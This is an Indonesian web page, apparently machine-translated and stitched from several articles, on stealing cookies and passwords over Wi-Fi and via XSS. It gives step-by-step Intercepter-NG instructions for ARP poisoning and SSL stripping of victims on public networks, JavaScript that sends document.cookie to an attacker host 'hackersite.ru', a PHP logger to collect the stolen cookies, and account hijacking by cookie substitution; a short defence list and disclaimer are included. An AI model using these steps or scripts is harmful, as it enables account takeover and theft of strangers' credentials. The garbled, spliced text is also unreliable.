rumah - Perangkat lunak
Cara mencegat cookie. Cara mudah untuk mencuri kue

Tentang bahaya access point Wifi terbuka, tentang bagaimana password bisa disadap.

Hari ini kita akan melihat cara mencegat kata sandi melalui Wi-Fi dan mencegat cookie melalui Wi-Fi menggunakan program ini.

Serangan itu akan terjadi karena Mengendus.

Mengendus— mengendus diterjemahkan sebagai “Mengendus.” Sniffing memungkinkan Anda menganalisis aktivitas jaringan di Internet, melihat situs mana yang dikunjungi pengguna, dan mencegat kata sandi. Tapi itu juga bisa digunakan untuk tujuan yang bermanfaat, untuk mendengarkan virus yang mengirimkan data apa pun ke Internet.


Cara yang akan saya tunjukkan cukup primitif dan sederhana. Bahkan, Anda bisa menggunakan program ini dengan lebih kuat.
Situs web resmi program sniff.su (salin tautannya dan buka di tab baru), Anda dapat mengunduhnya di bagian tersebut "Unduh".
Ada versi untuk Windows sistem Unix dan untuk android.
Kami akan mempertimbangkan untuk Windows karena ini adalah yang paling banyak sistem populer dan di sini programnya adalah yang paling canggih.
Browser atau antivirus Anda mungkin mengeluh bahwa program tersebut berbahaya, tetapi Anda sendiri memahami bahwa ini adalah program peretasan, dan program tersebut akan selalu merespons peretasan tersebut.
Program ini diunduh ke arsip zip, Anda hanya perlu membongkar program ke dalam folder dan menggunakannya, tidak perlu menginstal apa pun.
Program ini memiliki kemampuan untuk mengatur berbagai macam Serangan Mitm pada jaringan Wi-Fi.
Artikel ini ditulis semata-mata untuk tujuan informasi, untuk menunjukkan dengan contoh bahaya terbuka titik WiFi setiap tindakan yang ditentukan, Anda bertindak atas risiko dan risiko Anda sendiri. Dan saya ingin mengingatkan Anda tentang pertanggungjawaban pidana dalam melindungi data orang lain.

Melayani avi1 menawarkan harga yang sangat murah untuk kesempatan memesan pelanggan ke profil Instagram Anda. Raih peningkatan popularitas atau penjualan online sekarang juga, tanpa menghabiskan banyak tenaga dan waktu.

Bekerja dengan program Intercepter NG

Jadi, program ini diluncurkan melalui Intercepter-NG.exe.
Program ini memiliki antarmuka bahasa Inggris, tetapi jika Anda adalah pengguna komputer yang percaya diri, saya rasa Anda akan mengetahuinya.

Di bawah ini akan ada video pengaturannya (bagi yang lebih suka menonton daripada membaca).
- Memilih jaringan yang diinginkan di atas jika Anda memiliki beberapa di antaranya.
— Ganti jenisnya Ethernet/Wi-Fi, jika Anda memiliki Wi Fi, maka Anda perlu memilih ikon Wi FI (di sebelah kiri pilihan jaringan)

- Tekan tombolnya Modus Pemindaian(ikon radar)
- Di bidang kosong, klik kanan dan klik menu konteks Pemindaian cerdas
— Semua perangkat yang terhubung ke jaringan akan muncul
— Pilih korban (Anda dapat memilih semua orang sambil menahan tombol Shift), hanya saja jangan tandai router itu sendiri, IP-nya biasanya 192.168.1.1
- Setelah dipilih, klik kanan dan klik Tambahkan ke nat


- Buka tabnya Nat
- DI DALAM IP tersembunyi Dianjurkan untuk mengubah digit terakhir menjadi digit kosong, ini akan menyembunyikan IP asli Anda.
- Beri tanda centang Jalur SSL Dan Mimit SSL.


— Klik Pengaturan(roda gigi di sebelah kanan).
- Beri tanda centang Kebangkitan(Ini akan memungkinkan Anda untuk mencegat kata sandi dan cookie dari protokol Https terenkripsi) dan Hapus IP palsu/Mac. Anda dapat mencentang kotaknya Pembunuh Kue, terima kasih padanya, korban akan dikeluarkan dari halaman saat ini, misalnya jaringan sosial dan korban harus memasukkan kembali kata sandinya, dan kami akan mencegatnya. Bandingkan pengaturannya dengan gambar.


— Di sini setup selesai, tutup pengaturan dengan tanda centang.
— Penyiapan selesai, Anda dapat memulai serangan.
— Tekan tombol di bagian atas Mulai/berhenti mengendus(segitiga), di jendela yang sama klik ikon radiasi di bagian bawah Mulai/Hentikan Racun ARP
— Buka tab Modus kata sandi dan klik kanan di jendela dan pilih Tampilkan Cookie(“Ini akan memungkinkan cookie dan kata sandi yang dimasukkan oleh korban ditampilkan”)
Itu saja, kami menunggu seseorang memasukkan kata sandinya.
Terkadang Internet berhenti berfungsi, coba coba akses Internet sendiri, jika tidak berhasil, mulai ulang program.
Saya perhatikan bahwa tidak selalu mungkin untuk mencegat kata sandi, tetapi kenyataannya kata sandi itu berfungsi hampir tanpa kegagalan.

Itu saja, kami melihat penyadapan kata sandi melalui Wi-Fi dan penyadapan cookie melalui Wi-Fi.

jaga dirimu

Kue - informasi dalam bentuk file teks yang disimpan di komputer pengguna oleh situs web. Berisi data autentikasi (login/password, ID, nomor telepon, alamat kotak surat), pengaturan pengguna, status akses. Disimpan di profil browser.

Peretasan kue adalah pencurian (atau “pembajakan”) sesi pengunjung sumber daya web. Informasi pribadi tersedia tidak hanya bagi pengirim dan penerima, tetapi juga bagi pihak ketiga - orang yang melakukan intersepsi.

Alat dan Teknik Peretasan Cookie

Pencuri komputer, seperti rekan-rekannya di kehidupan nyata, selain keterampilan, ketangkasan dan pengetahuan, tentu saja, juga memiliki alatnya sendiri - semacam gudang kunci utama dan probe. Mari kita lihat trik paling populer yang digunakan peretas untuk mengekstrak cookie dari pengguna Internet.

Pengendus

Program khusus untuk pelacakan dan analisis lalu lintas jaringan. Nama mereka berasal dari kata kerja bahasa Inggris “sniff” (sniff), karena. secara harfiah “mengendus” paket yang dikirimkan antar node.

Namun penyerang menggunakan sniffer untuk mencegat data sesi, pesan, dan lainnya informasi rahasia. Sasaran serangan mereka sebagian besar adalah jaringan yang tidak terlindungi, di mana cookie dikirim dalam sesi HTTP terbuka, yang berarti cookie tersebut praktis tidak dienkripsi. (Wi-Fi publik adalah yang paling rentan dalam hal ini.)

Untuk menyematkan sniffer ke saluran Internet antara node pengguna dan server web, metode berikut digunakan:

  • “mendengarkan” antarmuka jaringan (hub, switch);
  • percabangan dan penyalinan lalu lintas;
  • menghubungkan ke celah saluran jaringan;
  • analisis melalui serangan khusus yang mengarahkan lalu lintas korban ke sniffer (MAC-spoofing, IP-spoofing).

Singkatan XSS adalah singkatan dari Lintas Situs Pembuatan skrip - pembuatan skrip lintas situs. Digunakan untuk menyerang situs web untuk mencuri data pengguna.

Prinsip XSS adalah sebagai berikut:

  • penyerang memasukkan kode berbahaya (skrip khusus yang disamarkan) ke halaman web situs web, forum, atau ke dalam pesan (misalnya, saat berkorespondensi di jejaring sosial);
  • korban membuka halaman yang terinfeksi dan mengaktifkan kode yang diinstal pada PC-nya (mengklik, mengikuti tautan, dll.);
  • pada gilirannya, kode berbahaya yang dieksekusi “mengekstraksi” data rahasia pengguna dari browser (khususnya, cookie) dan mengirimkannya ke server web penyerang.

Untuk “menanamkan” mekanisme perangkat lunak XSS, peretas menggunakan segala jenis kerentanan di server web, layanan online, dan browser.

Semua kerentanan XSS dibagi menjadi dua jenis:

  • Pasif. Serangan tersebut diperoleh dengan meminta skrip tertentu pada suatu halaman web. Kode berbahaya dapat dimasukkan ke dalam berbagai formulir di halaman web (misalnya, ke dalam bilah pencarian situs). Yang paling rentan terhadap XSS pasif adalah sumber daya yang tidak memfilter tag HTML saat data masuk;
  • Aktif. Terletak langsung di server. Dan mereka diaktifkan di browser korban. Mereka secara aktif digunakan oleh scammers di semua jenis blog, obrolan, dan feed berita.

Peretas dengan hati-hati “menyamarkan” skrip XSS mereka sehingga korban tidak curiga. Mereka mengubah ekstensi file, memberikan kode sebagai gambar, memotivasi mereka untuk mengikuti tautan, dan menarik mereka dengan konten yang menarik. Akibatnya: pengguna PC, yang tidak mampu mengendalikan rasa penasarannya, dengan tangannya sendiri (dengan satu klik mouse) mengirimkan cookie sesi (dengan login dan kata sandi!) ke pembuat skrip XSS - penjahat komputer.

Substitusi kue

Semua cookie disimpan dan dikirim ke server web (dari mana cookie tersebut “berasal”) tanpa perubahan apa pun - dalam bentuk aslinya - dengan nilai, string, dan data lainnya yang sama. Modifikasi parameternya yang disengaja disebut substitusi cookie. Dengan kata lain, saat mengganti cookie, penyerang berpura-pura hanya angan-angan. Misalnya, saat melakukan pembayaran di toko online, cookie mengubah jumlah pembayaran ke bawah - sehingga terjadi “penghematan” pada pembelian.

Cookie sesi yang dicuri di jejaring sosial dari akun orang lain “dimasukkan” ke sesi lain dan di PC lain. Pemilik cookie yang dicuri mendapatkan akses penuh ke akun korban (korespondensi, konten, pengaturan halaman) selama dia berada di halamannya.

“Pengeditan” cookie dilakukan dengan menggunakan:

  • Fungsi "Kelola cookie..." di peramban Opera;
  • Add-on Cookies Manager dan Advanced Cookie Manager untuk FireFox;
  • Utilitas IECookiesView (hanya untuk Internet Explorer);
  • editor teks seperti AkelPad, NotePad atau Windows Notepad.

Akses fisik ke data

Sangat rangkaian sederhana pelaksanaannya terdiri dari beberapa langkah. Namun ini hanya efektif jika komputer korban dengan sesi terbuka, misalnya VKontakte, dibiarkan tanpa pengawasan (dan untuk waktu yang lama!):

  1. DI DALAM bilah alamat browser dimasukkan fungsi javascript, menampilkan semua cookie yang disimpan.
  2. Setelah menekan “ENTER” semuanya muncul di halaman.
  3. Cookie disalin, disimpan ke file, dan kemudian ditransfer ke flash drive.
  4. Di PC lain, cookie diganti di sesi baru.
  5. Akses ke akun korban diberikan.

Biasanya, peretas menggunakan alat di atas (+ lainnya) baik secara kombinasi (karena tingkat perlindungan pada banyak sumber daya web cukup tinggi) dan secara terpisah (bila pengguna terlalu naif).

XSS + pelacak

  1. Skrip XSS dibuat, yang menentukan alamat sniffer online (baik buatan sendiri atau layanan tertentu).
  2. Kode berbahaya disimpan dengan ekstensi .img (format gambar).
  3. File ini kemudian diunggah ke halaman website, chat, atau pesan pribadi – dimana serangan akan dilakukan.
  4. Perhatian pengguna tertuju pada “perangkap” yang dibuat (di sinilah rekayasa sosial mulai berlaku).
  5. Jika jebakan terpicu, cookie dari browser korban akan disadap oleh sniffer.
  6. Penyerang membuka log sniffer dan mengambil cookie yang dicuri.
  7. Selanjutnya melakukan substitusi untuk mendapatkan hak pemilik akun menggunakan alat di atas.

Melindungi cookie dari peretasan

  1. Gunakan koneksi terenkripsi (menggunakan protokol dan metode keamanan yang sesuai).
  2. Jangan menanggapi tautan, gambar, atau tawaran menggiurkan yang meragukan untuk membiasakan diri Anda dengan “perangkat lunak gratis baru.” Terutama dari orang asing.
  3. Gunakan hanya sumber daya web tepercaya.
  4. Akhiri sesi otorisasi dengan mengklik tombol “Keluar” (bukan hanya menutup tab!). Apalagi jika Anda login ke akun Anda bukan dari komputer pribadi, melainkan dari PC di warnet, misalnya.
  5. Jangan gunakan fitur "Simpan Kata Sandi" di browser. Data registrasi yang disimpan meningkatkan risiko pencurian secara signifikan. Jangan malas, jangan buang waktu beberapa menit untuk memasukkan kata sandi dan login di awal setiap sesi.
  6. Setelah menjelajahi web - mengunjungi jejaring sosial, forum, obrolan, situs web - hapus cookie yang disimpan dan bersihkan cache browser.
  7. Perbarui browser dan perangkat lunak antivirus secara teratur.
  8. Gunakan ekstensi browser yang melindungi dari serangan XSS (misalnya NoScript untuk FF dan Google Chrome).
  9. Secara berkala di akun.

Dan yang terpenting, jangan kehilangan kewaspadaan dan perhatian saat bersantai atau bekerja di Internet!

Apa itu kue?

Ada mekanisme yang memungkinkan server http untuk menyimpan beberapa informasi teks, lalu hubungi dia. Informasi ini disebut kue. Pada dasarnya, setiap cookie adalah pasangan: nama parameter dan nilainya. Setiap cookie juga diberi domain miliknya. Demi alasan keamanan, di semua browser server http hanya diperbolehkan mengakses cookie domainnya. Selain itu, cookie mungkin memiliki tanggal kedaluwarsa, yang berarti cookie akan disimpan di komputer hingga tanggal tersebut, bahkan jika Anda menutup semua jendela browser.


Mengapa cookie penting?

Semua sistem multi-pengguna menggunakan cookie untuk mengidentifikasi pengguna. Atau sebaiknya, koneksi saat ini pengguna dengan layanan, sesi pengguna. Jika seseorang mengenali cookie Anda, mereka akan dapat masuk ke sistem atas nama Anda. Karena di saat ini sangat sedikit sumber daya Internet yang memeriksa perubahan alamat IP selama satu sesi pengguna.


Bagaimana cara mengubah atau mengganti cookie?

Pengembang browser tidak menyediakan alat bawaan untuk mengedit cookie. Tapi Anda bisa bertahan dengan notepad biasa.


Langkah 1: buat berkas teks dengan teks

Editor Registri Windows Versi 5.00



@="C:\\IE_ext.htm"

Simpan dengan nama IE_ext.reg

Langkah 2: Menggunakan file yang dibuat, tambahkan perubahan pada registri Windows.

Langkah 3: buat file teks dengan teks

< script bahasa="javascript">
external.menuArguments.clipboardData.setData("Teks" , external.menuArguments.document.cookie);

eksternal.menuArguments.document.cookie= "nama uji=nilai uji; jalur=/; domain=domainuji.ru";
alert(external.menuArguments.document.cookie);


Simpan dengan nama C:\IE_ext.htm

Langkah 4: Kami pergi ke situs web yang kami minati.

Langkah 5: Klik kanan pada ruang kosong di halaman dan pilih item menu "Bekerja dengan Cookie". Izinkan akses ke papan klip. Cookie Anda dari situs ini akan masuk ke clipboard. Anda dapat memasukkan notepad mereka dan melihatnya.


Langkah 6: Untuk mengubah beberapa cookie, edit file C:\IE_ext.htm, ganti nama tes atas nama kue, nilai tes- tentang maknanya, domain uji.ru– ke domain situs. Jika perlu, tambahkan lebih banyak baris serupa. Untuk kemudahan kontrol, saya menambahkan ke skrip keluaran cookie saat ini sebelum dan sesudah perubahan: alert(external.menuArguments.document.cookie);

Langkah 7: Lakukan Langkah 5 lagi, lalu segarkan halaman.

Intinya: kami akan mengakses sumber daya Internet ini dengan cookie yang diperbarui.

Bagaimana cara mencuri cookie menggunakan JavaScript?

Jika penyerang berhasil menemukan peluang untuk mengeksekusi skrip JavaScript sewenang-wenang di komputer korban, maka ia dapat membaca cookie saat ini dengan sangat mudah. Contoh:


var str= dokumen.cookie;

Namun apakah dia dapat mentransfernya ke situsnya, karena seperti yang saya sebutkan sebelumnya, skrip JavaScript tidak akan dapat mengakses situs yang terletak di domain berbeda tanpa konfirmasi tambahan? Ternyata skrip JavaScript dapat memuat gambar apa pun yang terletak di server http mana pun. Pada saat yang sama, transfer informasi teks apa pun dalam permintaan pengunduhan ke gambar ini. Contoh: http://hackersite.ru/xss.jpg?text_info Jadi jika Anda menjalankan kode ini:

var gambar= gambar baru();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokumen.cookie);


maka cookie tersebut akan berakhir di permintaan untuk mendownload “gambar” dan akan “pergi” ke penyerang.

Bagaimana cara menangani permintaan untuk mengunduh "gambar"?

Penyerang hanya perlu mencari hosting dengan dukungan PHP dan menempatkan kode seperti ini di sana:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Kemudian semua parameter permintaan untuk skrip ini akan disimpan dalam file log.txt. Yang tersisa hanyalah mengganti skrip JavaScript yang dijelaskan sebelumnya http://hackersite.ru/xss.jpg ke jalur ke skrip php ini.


Intinya

Saya hanya menunjukkan cara paling sederhana untuk mengeksploitasi kerentanan XSS. Namun hal ini membuktikan bahwa kehadiran setidaknya satu kerentanan tersebut di situs Internet multi-pengguna dapat memungkinkan penyerang menggunakan sumber dayanya atas nama Anda.

Pernahkah Anda memperhatikan bahwa ketika Anda kembali ke situs yang telah Anda kunjungi, situs tersebut mengenali Anda dan terbuka dengan pengaturan yang Anda terapkan terakhir kali? Ya, dan cukup sering? Hal ini terjadi berkat cookie yang menyimpan informasi tentang pengunjung seperti login, kata sandi, ID sesi, dan variabel lain yang diperlukan untuk mengidentifikasi pengunjung dan menampilkan konten halaman sesuai dengan preferensi pengguna yang dipilih selama kunjungan terakhir ke sumber daya. Program WebCookiesSniffer akan menampilkan cookie dan konten situs yang dilihat pengguna di browser kepada pengguna.

Lihat Cookie

Anda membuka situs web dan WebCookiesSniffer menangkapnya kue secara real-time. Utilitas menambahkan semua cookie yang ditangkap ke tabel yang menyimpan data tentang host, jalur permintaan, total panjang file cookie, jumlah variabel dalam file cookie, dan Cookie itu sendiri dengan nama variabel dan nilai. WebCookiesSniffer dapat menyimpan informasi yang dikumpulkan tentang cookie ke file teks. Program ini juga memiliki kemampuan untuk menghasilkan laporan HTML untuk semua atau cookie yang dipilih. Agar program dapat berfungsi, Anda harus menginstal driver WinPcap (terletak di arsip bersama dengan WebCookiesSniffer). Untuk mengubah bahasa program WebCookiesSniffer ke Rusia, salin file WebCookiesSniffer_lng.ini (juga disertakan dalam arsip) ke direktori dengan utilitas tersebut.

Tangkapan layar dari program WebCookiesSniffer



Halo, artikel pendek ini, agak genap Deskripsi Singkat Saya ingin mendedikasikan diri saya cara sederhana penangkapan kue V jaringan wi-fi. Saya tidak akan memberi tahu Anda di sini apa itu cookie dan mengapa diperlukan, jika seseorang tertarik untuk mencegat “makanan yang dipanggang”; dalam jaringan nirkabel, saya rasa dia harus tahu apa itu dan mengapa dia membutuhkannya. Saya hanya akan mengatakan satu hal: dengan menggunakan file ini Anda dapat memperoleh akses ke akun orang lain di berbagai situs yang mengharuskan pengguna melalui proses otentikasi (Misalnya, mail.ru, vkontakte.ru, dll.).

Jadi mari kita mulai. Pertama kita perlu menemukan jaringan nirkabel, dengan gateway akses Internet terbuka, dan diharapkan jaringan ini memiliki klien yang cukup banyak. Misalnya, jaringan apa pun di pusat perbelanjaan besar, bandara, berbagai kedai kopi bisa digunakan di tempat-tempat yang biasa digunakan orang akses wi-fi di Internet, untuk membaca surat, memeriksa akun di berbagai situs kencan, melihat LJ dan berbagai forum. Ini semua adalah apa yang kita perlukan. Setelah memutuskan pilihan lokasi jaringan, setelah mempelajari jam-jam tertentu dari jumlah maksimum klien, mari kita langsung ke operasi tempur. Untuk melakukan ini, kita memerlukan laptop dengan adaptor Wi-Fi dan serangkaian program tertentu. Dalam kasus saya, saya menggunakan laptop acer Aspire 3610, kartu wi-fi klien D-Link DWL G650 dan OS BackTrack3 diinstal.

Saya menyarankan Anda untuk menggunakan OS ini, karena OS ini sudah menyertakan seluruh rangkaian program yang mungkin Anda perlukan, dan keuntungan terpentingnya adalah Anda tidak perlu menginstal Backtrack di HDD, Anda dapat mem-boot OS ini langsung dari CD atau flash drive.

Sekarang mari kita beralih ke perangkat lunak yang diperlukan. Saya menggunakan kismet untuk penemuan jaringan, dan WifiZoo untuk mencegat cookie. Saya akan membahas program kedua secara rinci. WifiZoo merupakan pemindai gelombang udara pasif dan mengumpulkan cukup banyak informasi berguna, seperti: pop3, lalu lintas smtp, cookie http/authinfo, msn, kredensial ftp, lalu lintas jaringan telnet, nbt, dll. Satu-satunya kelemahan dari program ini adalah kurangnya mode Channel hopping, WifiZoo hanya mendengarkan antarmuka nirkabel, dan bisa dikatakan, tidak dapat berpindah dari satu saluran ke saluran lainnya. Namun kelemahan ini dikompensasi oleh program lain, Kismet, yang mendukung mode ini. Untuk memulai WifiZoo Anda memerlukan:

  • ular piton
  • menjijikkan
  • Nasib

Jadi mari kita luncurkan programnya, pertama mari kita luncurkan Kismet untuk mendukung mode saluran hopping, lalu luncurkan WifiZoo secara langsung, jendela berikut akan muncul di depan Anda:

Sekarang yang tersisa hanyalah duduk dan menunggu sampai Anda mencegat sesuatu, segala sesuatu yang disadap oleh program dapat ditemukan di log, yang terletak di direktori dengan program /logs/. Anda juga dapat meluncurkan antarmuka GUI yang secara otomatis terhubung ke http di 127.0.0.1:8000

Saya tidak akan menulis tentang semua fitur dari program yang luar biasa ini, saya pikir Anda akan mengetahui sendiri kemungkinan lainnya, dan karena itu saat ini Kami hanya tertarik pada cookie. Klik tautan yang bertuliskan cookie dan lihat apa yang kami sadap:



 


Membaca:



Menginstal dan memperbarui firmware Huawei dan Honor

Menginstal dan memperbarui firmware Huawei dan Honor

Sementara banyak pengguna hanya memimpikan Android 7.0 Nougat, Google sedang dalam tahap akhir pengujian versi berikutnya dari Android 8.0 O....

Membuat subtitle di Workshop Subtitle

Membuat subtitle di Workshop Subtitle

Subtitle Workshop adalah aplikasi gratis dan open source. Keunggulan program ini antara lain: ramah...

Spesialisasi "Teknologi infokomunikasi dan sistem komunikasi" (gelar sarjana) Teknologi infokomunikasi dan sistem komunikasi 11

Khusus

Kualifikasi lulusan: sarjana. Bentuk dan syarat studi: penuh waktu – 4 tahun; korespondensi (usk.) - 3 tahun 3 bulan Ujian masuk: matematika...

Odnoklassniki: cara membuka halaman saya

Odnoklassniki: cara membuka halaman saya

Halaman Odnoklassniki saya adalah profil pribadi setiap pengguna, yang berisi informasi dan foto yang ditunjukkan tentang dirinya. Tersedia untuk...

gambar umpan RSS